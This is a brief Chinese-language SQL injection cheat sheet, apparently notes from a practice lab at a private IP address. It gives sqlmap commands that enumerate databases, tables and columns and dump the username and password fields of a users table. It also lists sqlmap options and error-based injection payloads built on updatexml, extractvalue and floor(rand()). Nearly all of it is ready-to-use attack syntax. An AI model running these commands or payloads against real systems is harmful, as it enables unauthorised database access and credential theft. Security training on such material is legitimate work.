sqlmap注入
sqlmap注入
python sqlmap.py -u http://10.0.0.133:8002/mssq/less-1.asp?id=1 -dbs 爆库
python sqlmap.py -u http://10.0.0.133:8002/mssq/less-1.asp?id=1 -tables 爆表
python sqlmap.py -u http://10.0.0.133:8002/mssq/less-1.asp?id=1 -T users --columns 爆字段
python sqlmap.py -u http://10.0.0.133:8002/mssq/less-1.asp?id=1 -T users -C password,username --dump 爆字段值
-r 文件
–batch 自动处理
-D 数据库 --dbs
-T 表 --tables
-C字段 --columns
注入等级
–level
–risk
#UpdateXML()函数:
’ or updatexml(1,concat(0x7e,(database())),0) or ’
#ExtractValue()函数:
’ or extractvalue(1,concat(0x5e24,(database()))) or ’
#floor()报错:
1’and (select 1 from (select count(*),concat(‘‘,database(),’’,floor(rand(0)*2))as x from information_schema.tables group by x)a))#
